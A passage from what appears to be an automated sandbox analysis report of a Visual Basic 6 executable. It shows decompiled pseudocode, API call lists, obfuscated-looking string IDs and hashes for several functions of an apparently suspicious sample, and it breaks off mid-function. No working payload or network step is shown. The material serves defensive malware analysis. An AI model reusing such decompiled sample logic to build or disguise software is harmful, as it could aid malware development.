      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
      • String ID: Rutiner$Sciuroid8$\qc17$appdata
      • API String ID: 862176544-1118470403
      • Opcode ID: 187e6ce4f1c9310b884680b4e9c7d57eb98f110d72c96781ae855914515096a7
      • Instruction ID: dc099b398db05ea38f30894bda93dde84c90b6edb405c0263d744c717741900f
      • Opcode Fuzzy Hash: 187e6ce4f1c9310b884680b4e9c7d57eb98f110d72c96781ae855914515096a7
      • Instruction Fuzzy Hash: 7051ED71900218AEDB10EBA1CD46FDEB7B8BF14708F5041BAF105B71E1DB785A89CB69
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041E9AA, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179COMMON
      Download Yara Rule
      C-Code - Quality: 63%
      			E0041E9AA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				short _v40;
				char _v44;
				void* _v48;
				intOrPtr _v56;
				char _v64;
				char _v80;
				void* _v100;
				char _v104;
				void* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _v132;
				intOrPtr* _v136;
				signed int _v140;
				signed int _v144;
				char* _t86;
				char* _t87;
				signed int _t91;
				signed int _t98;
				short _t102;
				signed int _t108;
				signed int _t113;
				void* _t134;
				void* _t136;
				intOrPtr _t137;

				_t137 = _t136 - 0xc;
				 *[fs:0x0] = _t137;
				L00401540();
				_v16 = _t137;
				_v12 = 0x401330;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x78,  *[fs:0x0], 0x401546, _t134);
				L00401708();
				_t86 =  &_v44;
				L00401858();
				L004016D8();
				L0040183A();
				L00401846();
				L00401828();
				L00401792();
				_t87 =  &_v48;
				L00401798();
				_v108 = _t87;
				_t91 =  *((intOrPtr*)( *_v108 + 0x1c))(_v108,  &_v104, _t87, _t86, L"Flimflam", L"Fribords2", _t86, _t86,  &_v64, 1, 0xffffffff, 0,  &_v64, 0xe8);
				asm("fclex");
				_v112 = _t91;
				if(_v112 >= 0) {
					_v132 = _v132 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x402658);
					_push(_v108);
					_push(_v112);
					L004017C8();
					_v132 = _t91;
				}
				_v56 = _v104;
				_v64 = 3;
				_push( &_v64);
				_push( &_v80);
				L00401678();
				_push( &_v80);
				L00401834();
				L0040183A();
				L004017C2();
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401840();
				_v56 = 0x7042c;
				_v64 = 3;
				_t98 =  &_v64;
				_push(_t98);
				L004017E6();
				L0040183A();
				_push(_t98);
				_push(L"INVALIDNESS");
				L0040172C();
				asm("sbb eax, eax");
				_v108 =  ~( ~_t98 + 1);
				L00401846();
				L00401828();
				_t102 = _v108;
				if(_t102 != 0) {
					L00401672();
					L0040183A();
					if( *0x4223c0 != 0) {
						_v136 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v136 = 0x4223c0;
					}
					_v108 =  *_v136;
					_t108 =  *((intOrPtr*)( *_v108 + 0x14))(_v108,  &_v48);
					asm("fclex");
					_v112 = _t108;
					if(_v112 >= 0) {
						_v140 = _v140 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v108);
						_push(_v112);
						L004017C8();
						_v140 = _t108;
					}
					_v116 = _v48;
					_t113 =  *((intOrPtr*)( *_v116 + 0x68))(_v116,  &_v100);
					asm("fclex");
					_v120 = _t113;
					if(_v120 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x4025b8);
						_push(_v116);
						_push(_v120);
						L004017C8();
						_v144 = _t113;
					}
					_t102 = _v100;
					_v40 = _t102;
					L004017C2();
				}
				_push(0x41ec2d);
				L00401846();
				L00401846();
				L00401846();
				return _t102;
			}



































      0x0041e9ad
      0x0041e9bc
      0x0041e9c6
      0x0041e9ce
      0x0041e9d1
      0x0041e9d8
      0x0041e9e7
      0x0041e9f3
      0x0041ea02
      0x0041ea06
      0x0041ea16
      0x0041ea20
      0x0041ea28
      0x0041ea30
      0x0041ea35
      0x0041ea3b
      0x0041ea3f
      0x0041ea44
      0x0041ea53
      0x0041ea56
      0x0041ea58
      0x0041ea5f
      0x0041ea78
      0x0041ea61
      0x0041ea61
      0x0041ea63
      0x0041ea68
      0x0041ea6b
      0x0041ea6e
      0x0041ea73
      0x0041ea73
      0x0041ea7f
      0x0041ea82
      0x0041ea8c
      0x0041ea90
      0x0041ea91
      0x0041ea99
      0x0041ea9a
      0x0041eaa4
      0x0041eaac
      0x0041eab4
      0x0041eab8
      0x0041eab9
      0x0041eabb
      0x0041eac3
      0x0041eaca
      0x0041ead1
      0x0041ead4
      0x0041ead5
      0x0041eadf
      0x0041eae4
      0x0041eae5
      0x0041eaea
      0x0041eaf1
      0x0041eaf6
      0x0041eafd
      0x0041eb05
      0x0041eb0a
      0x0041eb10
      0x0041eb16
      0x0041eb20
      0x0041eb2c
      0x0041eb49
      0x0041eb2e
      0x0041eb2e
      0x0041eb33
      0x0041eb38
      0x0041eb3d
      0x0041eb3d
      0x0041eb5b
      0x0041eb6a
      0x0041eb6d
      0x0041eb6f
      0x0041eb76
      0x0041eb92
      0x0041eb78
      0x0041eb78
      0x0041eb7a
      0x0041eb7f
      0x0041eb82
      0x0041eb85
      0x0041eb8a
      0x0041eb8a
      0x0041eb9c
      0x0041ebab
      0x0041ebae
      0x0041ebb0
      0x0041ebb7
      0x0041ebd3
      0x0041ebb9
      0x0041ebb9
      0x0041ebbb
      0x0041ebc0
      0x0041ebc3
      0x0041ebc6
      0x0041ebcb
      0x0041ebcb
      0x0041ebda
      0x0041ebde
      0x0041ebe5
      0x0041ebe5
      0x0041ebea
      0x0041ec17
      0x0041ec1f
      0x0041ec27
      0x0041ec2c

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041E9C6
      • #526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041E9F3
      • __vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EA06
      • #712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EA16
      • __vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EA20
      • __vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EA28
      • __vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EA30
      • #685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EA35
      • __vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041EA3F
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402658,0000001C), ref: 0041EA6E
      • #613.MSVBVM60(?,00000003), ref: 0041EA91
      • __vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EA9A
      • __vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EAA4
      • __vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EAAC
      • __vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EABB
      • #574.MSVBVM60(00000003), ref: 0041EAD5
      • __vbaStrMove.MSVBVM60(00000003), ref: 0041EADF
      • __vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EAEA
      • __vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EAFD
      • __vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EB05
      • #611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EB16
      • __vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EB20
      • __vbaNew2.MSVBVM60(004025A8,004223C0,INVALIDNESS,00000000,00000003), ref: 0041EB38
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014), ref: 0041EB85
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,00000068), ref: 0041EBC6
      • __vbaFreeObj.MSVBVM60(00000000,?,004025B8,00000068), ref: 0041EBE5
      • __vbaFreeStr.MSVBVM60(0041EC2D,INVALIDNESS,00000000,00000003), ref: 0041EC17
      • __vbaFreeStr.MSVBVM60(0041EC2D,INVALIDNESS,00000000,00000003), ref: 0041EC1F
      • __vbaFreeStr.MSVBVM60(0041EC2D,INVALIDNESS,00000000,00000003), ref: 0041EC27
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
      • String ID: Flimflam$Fribords2$INVALIDNESS
      • API String ID: 2258197736-3412120936
      • Opcode ID: feafa39f8d7aadacbcacc8dd2bbed201d1edb36b9f344be4025da2f214139910
      • Instruction ID: ab1011f341e92bec7c78ee0fb2f786c417e500ae58868e1297a821d186d6142f
      • Opcode Fuzzy Hash: feafa39f8d7aadacbcacc8dd2bbed201d1edb36b9f344be4025da2f214139910
      • Instruction Fuzzy Hash: DF711875D00218AFDB00EBA2C885BDDBBB8BF08704F50812AF505BB1E1DB785A45CF58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041EE54, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204COMMON
      Download Yara Rule
      C-Code - Quality: 61%
      			E0041EE54(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				char _v44;
				signed int _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char* _v92;
				char _v100;
				char* _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed int _v132;
				signed int _v140;
				intOrPtr* _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v164;
				short _t110;
				char* _t112;
				signed int _t118;
				signed int _t123;
				signed int _t130;
				char* _t133;
				signed int _t136;
				intOrPtr _t168;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t168;
				L00401540();
				_v12 = _t168;
				_v8 = 0x401368;
				L004017B6();
				L004017B6();
				L004017B6();
				_v92 =  &_v44;
				_v100 = 0x4008;
				_push( &_v100);
				_push( &_v68);
				L0040181C();
				_v108 = L"ICHTHYOPOLISM";
				_v116 = 0x8008;
				_push( &_v68);
				_t110 =  &_v116;
				_push(_t110);
				L00401660();
				_v120 = _t110;
				L00401828();
				if(_v120 != 0) {
					if( *0x4223c0 != 0) {
						_v144 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v144 = 0x4223c0;
					}
					_v120 =  *_v144;
					_t118 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t118;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v148 = _t118;
					}
					_v128 = _v52;
					_t123 =  *((intOrPtr*)( *_v128 + 0xd8))(_v128,  &_v48);
					asm("fclex");
					_v132 = _t123;
					if(_v132 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0xd8);
						_push(0x4025b8);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v152 = _t123;
					}
					_v140 = _v48;
					_v48 = _v48 & 0x00000000;
					L0040183A();
					L004017C2();
					if( *0x4223c0 != 0) {
						_v156 = 0x4223c0;
					} else {
						_push(0x4223c0);
						_push(0x4025a8);
						L004017CE();
						_v156 = 0x4223c0;
					}
					_v120 =  *_v156;
					_t130 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v52);
					asm("fclex");
					_v124 = _t130;
					if(_v124 >= 0) {
						_v160 = _v160 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402598);
						_push(_v120);
						_push(_v124);
						L004017C8();
						_v160 = _t130;
					}
					_v128 = _v52;
					_v108 = 0x80020004;
					_v116 = 0xa;
					_v60 = 0x92ac1b00;
					_v56 = 0x5af5;
					_v68 = 6;
					L00401540();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t133 =  &_v68;
					L0040165A();
					L0040183A();
					_t136 =  *((intOrPtr*)( *_v128 + 0x13c))(_v128, _t133, _t133, 0xffffffff, 0xfffffffe, 0xfffffffe, 0xfffffffe, 0x10);
					asm("fclex");
					_v132 = _t136;
					if(_v132 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x13c);
						_push(0x4025b8);
						_push(_v128);
						_push(_v132);
						L004017C8();
						_v164 = _t136;
					}
					L00401846();
					L004017C2();
					L00401828();
				}
				_v60 = 0x607e9f;
				_v68 = 3;
				_t112 =  &_v68;
				_push(_t112);
				L0040166C();
				L0040183A();
				L00401828();
				_v24 = 0x5b2ec5;
				_push(0x41f173);
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				L00401846();
				return _t112;
			}







































      0x0041ee59
      0x0041ee64
      0x0041ee65
      0x0041ee71
      0x0041ee79
      0x0041ee7c
      0x0041ee89
      0x0041ee94
      0x0041eea1
      0x0041eea9
      0x0041eeac
      0x0041eeb6
      0x0041eeba
      0x0041eebb
      0x0041eec0
      0x0041eec7
      0x0041eed1
      0x0041eed2
      0x0041eed5
      0x0041eed6
      0x0041eedb
      0x0041eee2
      0x0041eeed
      0x0041eefa
      0x0041ef17
      0x0041eefc
      0x0041eefc
      0x0041ef01
      0x0041ef06
      0x0041ef0b
      0x0041ef0b
      0x0041ef29
      0x0041ef38
      0x0041ef3b
      0x0041ef3d
      0x0041ef44
      0x0041ef60
      0x0041ef46
      0x0041ef46
      0x0041ef48
      0x0041ef4d
      0x0041ef50
      0x0041ef53
      0x0041ef58
      0x0041ef58
      0x0041ef6a
      0x0041ef79
      0x0041ef7f
      0x0041ef81
      0x0041ef88
      0x0041efa7
      0x0041ef8a
      0x0041ef8a
      0x0041ef8f
      0x0041ef94
      0x0041ef97
      0x0041ef9a
      0x0041ef9f
      0x0041ef9f
      0x0041efb1
      0x0041efb7
      0x0041efc4
      0x0041efcc
      0x0041efd8
      0x0041eff5
      0x0041efda
      0x0041efda
      0x0041efdf
      0x0041efe4
      0x0041efe9
      0x0041efe9
      0x0041f007
      0x0041f016
      0x0041f019
      0x0041f01b
      0x0041f022
      0x0041f03e
      0x0041f024
      0x0041f024
      0x0041f026
      0x0041f02b
      0x0041f02e
      0x0041f031
      0x0041f036
      0x0041f036
      0x0041f048
      0x0041f04b
      0x0041f052
      0x0041f059
      0x0041f060
      0x0041f067
      0x0041f071
      0x0041f07b
      0x0041f07c
      0x0041f07d
      0x0041f07e
      0x0041f087
      0x0041f08b
      0x0041f095
      0x0041f0a3
      0x0041f0a9
      0x0041f0ab
      0x0041f0b2
      0x0041f0d1
      0x0041f0b4
      0x0041f0b4
      0x0041f0b9
      0x0041f0be
      0x0041f0c1
      0x0041f0c4
      0x0041f0c9
      0x0041f0c9
      0x0041f0db
      0x0041f0e3
      0x0041f0eb
      0x0041f0eb
      0x0041f0f0
      0x0041f0f7
      0x0041f0fe
      0x0041f101
      0x0041f102
      0x0041f10c
      0x0041f114
      0x0041f119
      0x0041f120
      0x0041f14d
      0x0041f155
      0x0041f15d
      0x0041f165
      0x0041f16d
      0x0041f172

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041EE71
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE89
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EE94
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EEA1
      • #524.MSVBVM60(?,00004008), ref: 0041EEBB
      • __vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041EED6
      • __vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041EEE2
      • __vbaNew2.MSVBVM60(004025A8,004223C0,00008008,?,?,?,?,00004008), ref: 0041EF06
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF53
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EF9A
      • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EFC4
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EFCC
      • __vbaNew2.MSVBVM60(004025A8,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041EFE4
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402598,00000014,?,?,?,?,?,?,?,00008008,?,?,?,?), ref: 0041F031
      • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F071
      • #703.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F08B
      • __vbaStrMove.MSVBVM60(00000006,000000FF,000000FE,000000FE,000000FE,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F095
      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025B8,0000013C,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F0C4
      • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F0DB
      • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F0E3
      • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F0EB
      • #536.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F102
      • __vbaStrMove.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F10C
      • __vbaFreeVar.MSVBVM60(00000003,00008008,?,?,?,?,00004008), ref: 0041F114
      • __vbaFreeStr.MSVBVM60(0041F173,00000003,00008008,?,?,?,?,00004008), ref: 0041F14D
      • __vbaFreeStr.MSVBVM60(0041F173,00000003,00008008,?,?,?,?,00004008), ref: 0041F155
      • __vbaFreeStr.MSVBVM60(0041F173,00000003,00008008,?,?,?,?,00004008), ref: 0041F15D
      • __vbaFreeStr.MSVBVM60(0041F173,00000003,00008008,?,?,?,?,00004008), ref: 0041F165
      • __vbaFreeStr.MSVBVM60(0041F173,00000003,00008008,?,?,?,?,00004008), ref: 0041F16D
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$CheckHresult$CopyMove$ChkstkNew2$#524#536#703
      • String ID: Gurgledes$ICHTHYOPOLISM
      • API String ID: 2536202667-1995639141
      • Opcode ID: 23d49032a413f1c24a2f97d822e11c6c21d335a05c7b4227f57571f366960144
      • Instruction ID: 830ea4e644f8ba0c5a6757b0c78b7551ce7010ed583fdea853f5391d685ea2a3
      • Opcode Fuzzy Hash: 23d49032a413f1c24a2f97d822e11c6c21d335a05c7b4227f57571f366960144
      • Instruction Fuzzy Hash: 2E91F771D00218EFDB10EFA5C985BDDBBB5BF09304F20416AE405B72A2DB785A49CF58
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041F18E, Relevance: 50.9, APIs: 24, Strings: 5, Instructions: 130COMMON
      Download Yara Rule
      C-Code - Quality: 49%
      			E0041F18E(void* __ebx, void* __edi, void* __esi, void* _a16, void* _a20, signed int* _a24) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v48;
				void* _v52;
				void* _v56;
				char _v60;
				char _v64;
				intOrPtr _v72;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v112;
				char* _v120;
				intOrPtr _v128;
				signed int* _v136;
				char _v144;
				signed int _v148;
				short _v152;
				signed int _v164;
				signed int* _t54;
				signed int _t56;
				short _t58;
				char* _t61;
				char* _t67;
				void* _t95;
				intOrPtr _t96;

				_t96 = _t95 - 0xc;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t96;
				L00401540();
				_v16 = _t96;
				_v12 = 0x401380;
				L004017B6();
				L004017B6();
				_t54 = _a24;
				 *_t54 =  *_t54 & 0x00000000;
				_push(L"Dukkestuer");
				L00401762();
				_v136 = _t54;
				_v144 = 0x8003;
				_v72 =  *0x401378;
				_v80 = 4;
				_push( &_v96);
				_t56 =  &_v80;
				_push(_t56);
				L004017A4();
				_v148 = _t56;
				if(_v148 >= 0) {
					_v164 = _v164 & 0x00000000;
				} else {
					_push(_v148);
					L0040179E();
					_v164 = _t56;
				}
				_push( &_v144);
				_t58 =  &_v96;
				_push(_t58);
				L004016AE();
				_v152 = _t58;
				_push( &_v96);
				_push( &_v80);
				_push(2);
				L00401840();
				_t61 = _v152;
				if(_t61 != 0) {
					_push( &_v80);
					L00401654();
					L0040174A();
					_v88 = 5;
					_v96 = 2;
					_v120 = L"LAAGETS";
					_v128 = 8;
					L0040184C();
					_push( &_v96);
					_push(5);
					_push( &_v80);
					_push( &_v112);
					L0040168A();
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push( &_v112);
					_t67 =  &_v60;
					_push(_t67);
					L00401858();
					_push(_t67);
					_push(L"SNVRET");
					_push(L"OVERBEBYRDES");
					L004016D8();
					L0040183A();
					_push(_t67);
					L004017B0();
					L0040183A();
					_push( &_v64);
					_push( &_v60);
					_push(2);
					L004017D4();
					_push( &_v112);
					_push( &_v96);
					_t61 =  &_v80;
					_push(_t61);
					_push(3);
					L00401840();
				}
				L004017B6();
				asm("wait");
				_push(0x41f396);
				L00401846();
				L00401846();
				L00401828();
				L00401846();
				return _t61;
			}































      0x0041f191
      0x0041f194
      0x0041f19f
      0x0041f1a0
      0x0041f1ac
      0x0041f1b4
      0x0041f1b7
      0x0041f1c4
      0x0041f1cf
      0x0041f1d4
      0x0041f1d7
      0x0041f1da
      0x0041f1df
      0x0041f1e4
      0x0041f1ea
      0x0041f1fa
      0x0041f1fd
      0x0041f207
      0x0041f208
      0x0041f20b
      0x0041f20c
      0x0041f211
      0x0041f21e
      0x0041f233
      0x0041f220
      0x0041f220
      0x0041f226
      0x0041f22b
      0x0041f22b
      0x0041f240
      0x0041f241
      0x0041f244
      0x0041f245
      0x0041f24a
      0x0041f254
      0x0041f258
      0x0041f259
      0x0041f25b
      0x0041f263
      0x0041f26c
      0x0041f275
      0x0041f276
      0x0041f281
      0x0041f286
      0x0041f28d
      0x0041f294
      0x0041f29b
      0x0041f2a8
      0x0041f2b0
      0x0041f2b1
      0x0041f2b6
      0x0041f2ba
      0x0041f2bb
      0x0041f2c0
      0x0041f2c2
      0x0041f2c4
      0x0041f2c9
      0x0041f2ca
      0x0041f2cd
      0x0041f2ce
      0x0041f2d3
      0x0041f2d4
      0x0041f2d9
      0x0041f2de
      0x0041f2e8
      0x0041f2ed
      0x0041f2ee
      0x0041f2f8
      0x0041f300
      0x0041f304
      0x0041f305
      0x0041f307
      0x0041f312
      0x0041f316
      0x0041f317
      0x0041f31a
      0x0041f31b
      0x0041f31d
      0x0041f322
      0x0041f32d
      0x0041f332
      0x0041f333
      0x0041f378
      0x0041f380
      0x0041f388
      0x0041f390
      0x0041f395

      APIs
      • __vbaChkstk.MSVBVM60(?,00401546), ref: 0041F1AC
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F1C4
      • __vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F1CF
      • __vbaLenBstrB.MSVBVM60(Dukkestuer,?,?,?,?,00401546), ref: 0041F1DF
      • #564.MSVBVM60(00000004,?), ref: 0041F20C
      • __vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041F226
      • __vbaVarTstLt.MSVBVM60(?,00008003,?,?,?,00000004,?), ref: 0041F245
      • __vbaFreeVarList.MSVBVM60(00000002,00000004,?,?,00008003,?,?,?,00000004,?), ref: 0041F25B
      • #546.MSVBVM60(?,?,?,00401546), ref: 0041F276
      • __vbaVarMove.MSVBVM60(?,?,?,00401546), ref: 0041F281
      • __vbaVarDup.MSVBVM60 ref: 0041F2A8
      • #629.MSVBVM60(?,?,00000005,00000002), ref: 0041F2BB
      • __vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F2CE
      • #712.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F2DE
      • __vbaStrMove.MSVBVM60(OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F2E8
      • #527.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F2EE
      • __vbaStrMove.MSVBVM60(00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F2F8
      • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,OVERBEBYRDES,SNVRET,00000000,?,?,00000001,000000FF,00000000,?,?,00000005,00000002), ref: 0041F307
      • __vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,00401546), ref: 0041F31D
      • __vbaStrCopy.MSVBVM60(?,?,00401546), ref: 0041F32D
      • __vbaFreeStr.MSVBVM60(0041F396,?,?,00401546), ref: 0041F378
      • __vbaFreeStr.MSVBVM60(0041F396,?,?,00401546), ref: 0041F380
      • __vbaFreeVar.MSVBVM60(0041F396,?,?,00401546), ref: 0041F388
      • __vbaFreeStr.MSVBVM60(0041F396,?,?,00401546), ref: 0041F390
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.874703917.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000000.00000002.874697226.0000000000400000.00000002.00020000.sdmp Download File
      • Associated: 00000000.00000002.874730146.0000000000422000.00000004.00020000.sdmp Download File
      • Associated: 00000000.00000002.874743724.0000000000424000.00000002.00020000.sdmp Download File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_400000_Unpoetical.jbxd
      Similarity
      • API ID: __vba$Free$CopyListMove$#527#546#564#629#712BstrCheckChkstkHresult
      • String ID: Antievangelical9$Dukkestuer$LAAGETS$OVERBEBYRDES$SNVRET
      • API String ID: 3927249403-1920341584
      • Opcode ID: 54af7d34284f0c3b2bd0935f0db6750eb5fda56c6a8c08a3db55edde39b5d9ba
      • Instruction ID: ff3934a22776a34dd7fba542cecb821680990e2fadc34e8312c7f96330c25f5f
      • Opcode Fuzzy Hash: 54af7d34284f0c3b2bd0935f0db6750eb5fda56c6a8c08a3db55edde39b5d9ba
      • Instruction Fuzzy Hash: D951FA71D0020DABDB10EBE1C846FDEB778AF14704F10817AB515B71E1EB785A498B99
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0041E819, Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 95COMMON
      Download Yara Rule
      C-Code - Quality: 49%
      			E0041E819(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v52;
				intOrPtr _v60;
				char _v68;
				char _v84;
				char* _v92;
				intOrPtr _v100;
				signed int* _t37;
				char* _t40;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t67 = _t66 - 0xc;
				 *[fs:0x0] = _t67;
				L00401540();
				_v16 = _t67;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x64,  *[fs:0x0], 0x401546, _t64);
				_t37 = _a16;
				 *_t37 =  *_t37 & 0x00000000;
